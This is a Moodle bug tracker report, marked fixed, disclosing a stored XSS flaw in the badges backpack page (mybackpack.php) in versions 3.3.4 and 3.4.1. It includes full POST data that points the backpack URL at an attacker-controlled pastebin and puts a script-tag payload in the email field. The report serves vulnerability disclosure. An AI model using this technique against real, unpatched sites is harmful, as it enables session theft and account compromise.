-
Bug
-
Resolution: Fixed
-
Minor
-
3.3.4, 3.4.1
-
MOODLE_33_STABLE, MOODLE_34_STABLE
-
MOODLE_33_STABLE, MOODLE_34_STABLE
-
MDL-61261-master -
Hello,
I discovered a vulnerability in /badges/mybackpack.php where I achieved stored XSS.
Description
When making a request to https://backpack.openbadges.org via /badges/mybackpack.php it will give either a JSON response that states the email given exists or does not exist.
If I change the url to a URL under my controll (via POST, for example: https://pastebin.com/raw/HJWNqwnk? including the question mark) it will say the email exists and will put the given e-mail on the page (in this case a XSS payload).
URL:
|
https://localhost/moodle/badges/mybackpack.php
|
POST data:
|
userid=1&backpackurl=https%3A%2f%2fpastebin.com%2fraw%2fHJWNqwnk%3F&email=<script>alert(1);</script>&sesskey=:SESSKEY&qf_edit_backpack_form=1&mform_isexpanded_id_backpackheader=1&revertbutton=Connect+using+a+different+email+address
|
|
https://i.imgur.com/pQJNLpv.png
Kind regards,
Damian Ebelties